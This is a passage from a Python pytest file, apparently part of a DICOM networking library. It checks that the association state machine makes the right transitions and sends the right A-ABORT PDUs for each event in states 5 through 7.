("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt4", "AE-4"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta1"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt4"]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta5 + Evt5 -> <ignore> -> Sta5
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta5 + Evt6."""
# Sta5 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt6"]
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt07(self):
"""Test Sta5 + Evt7."""
# Sta5 + Evt7 -> <ignore> -> Sta5
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
]
assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt7"]
def test_evt08(self):
"""Test Sta5 + Evt8."""
# Sta5 + Evt8 -> <ignore> -> Sta5
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
]
assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt8"]
def test_evt09(self):
"""Test Sta5 + Evt9."""
# Sta5 + Evt9 -> <ignore> -> Sta5
# Evt9: Receive P-DATA primitive from <local user>
commands = [("recv", None), ("exit", None)] # recv a-associate-rq
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
]
assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt9"]
def test_evt10(self):
"""Test Sta5 + Evt10."""
# Sta5 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [("recv", None), ("send", p_data_tf), ("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt10", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt10"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt11(self):
"""Test Sta5 + Evt11."""
# Sta5 + Evt11 -> <ignore> -> Sta5
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
]
assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt11"]
def test_evt12(self):
"""Test Sta5 + Evt12."""
# Sta5 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt12", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt12"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt13(self):
"""Test Sta5 + Evt13."""
# Sta5 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_release_rp),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt13", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt13"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt14(self):
"""Test Sta5 + Evt14."""
# Sta5 + Evt14 -> <ignore> -> Sta5
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
]
assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt14"]
def test_evt15(self):
"""Test Sta5 + Evt15."""
# Sta5 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and restart ARTIM
commands = [("recv", None), ("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt15", "AA-1"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt15"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
)
def test_evt16(self):
"""Test Sta5 + Evt16."""
# Sta5 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: If service user initiated:
# Issue A-ABORT primitive and close transport
# Otherwise
# Issue A-P-ABORT primitive and close transport
commands = [("recv", None), ("send", a_abort), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt16", "AA-3"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta1"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt16"]
def test_evt17(self):
"""Test Sta5 + Evt17."""
# Sta1 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt17", "AA-4"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta1"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt17"]
def test_evt18(self):
"""Test Sta5 + Evt18."""
# Sta5 + Evt18 -> <ignore> -> Sta5
# Evt18: ARTIM timer expired from <local service>
commands = [("recv", None), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt18"]
def test_evt19(self):
"""Test Sta5 + Evt19."""
# Sta5 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", b"\x08\x00\x00\x00\x00\x00"),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt19", "AA-8"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt19"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState06(TestStateBase):
"""Tests for State 06: Association established and ready for data."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta6")
def test_evt01(self):
"""Test Sta6 + Evt1."""
# Sta6 + Evt1 -> <ignore> -> Sta6
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta6 + Evt2."""
# Sta6 + Evt2 -> <ignore> -> Sta6
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta6 + Evt3."""
# Sta6 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt3", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt3"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt04(self):
"""Test Sta6 + Evt4."""
# Sta6 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_associate_rj),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt4", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt4"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta6 + Evt5."""
# Sta6 + Evt5 -> <ignore> -> Sta6
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta6 + Evt6."""
# Sta6 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_associate_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt6"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt07(self):
"""Test Sta6 + Evt7."""
# Sta6 + Evt7 -> <ignore> -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt7"]
def test_evt08(self):
"""Test Sta6 + Evt8."""
# Sta6 + Evt8 -> <ignore> -> Sta6
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt8"]
def test_evt09(self):
"""Test Sta6 + Evt9."""
# Sta6 + Evt9 -> DT-1 -> Sta6
# Evt9: Receive P-DATA primitive from <local user>
# DT-1: Send P-DATA-TD PDU
commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt9", "DT-1"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta6"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt9"]
def test_evt10(self):
"""Test Sta6 + Evt10."""
# Sta6 + Evt10 -> DT-2 -> Sta6
# Evt10: Receive P-DATA-TF PDU from <remote>
# DT-2: Send P-DATA primitive
commands = [
("recv", None),
("send", a_associate_ac),
("send", p_data_tf),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt10", "DT-2"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta6"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt10"]
def test_evt11(self):
"""Test Sta6 + Evt11."""
# Sta6 + Evt11 -> AR-1 -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt11"]
def test_evt12(self):
"""Test Sta6 + Evt12."""
# Sta6 + Evt12 -> AR-2 -> Sta8
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-2: Issue A-RELEASE (rq) primitive
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt12"]
def test_evt13(self):
"""Test Sta6 + Evt13."""
# Sta6 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rp),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt13", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt13"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt14(self):
"""Test Sta6 + Evt14."""
# Sta6 + Evt14 -> <ignore> -> Sta6
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt14"]
def test_evt15(self):
"""Test Sta6 + Evt15."""
# Sta6 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.abort()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt15", "AA-1"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt15"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
)
def test_evt16(self):
"""Test Sta6 + Evt16."""
# Sta6 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT, and close connection
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_abort),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt16", "AA-3"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta1"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt16"]
def test_evt17(self):
"""Test Sta6 + Evt17."""
# Sta6 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt17", "AA-4"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta1"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt17"]
def test_evt18(self):
"""Test Sta6 + Evt18."""
# Sta6 + Evt18 -> <ignore> -> Sta6
# Evt18: ARTIM timer expired from <local service>
commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt18"]
def test_evt19(self):
"""Test Sta6 + Evt19."""
# Sta6 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", b"\x08\x00\x00\x00\x00\x00"),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt19", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta13"]
assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt3", "Evt19"]
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState07(TestStateBase):
"""Tests for State 07: Awaiting A-RELEASE-RP PDU."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta6")
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta7")
def test_evt01(self):
"""Test Sta7 + Evt1."""
# Sta7 + Evt1 -> <ignore> -> Sta7
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta7 + Evt2."""
# Sta7 + Evt2 -> <ignore> -> Sta7
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta7 + Evt3."""
# Sta7 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt3", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt3"]
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt04(self):
"""Test Sta7 + Evt4."""
# Sta7 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_associate_rj),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt4", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt4"]
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta7 + Evt5."""
# Sta7 + Evt5 -> <ignore> -> Sta7
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta7 + Evt6."""
# Sta7 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_associate_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt6", "AA-8"),
]
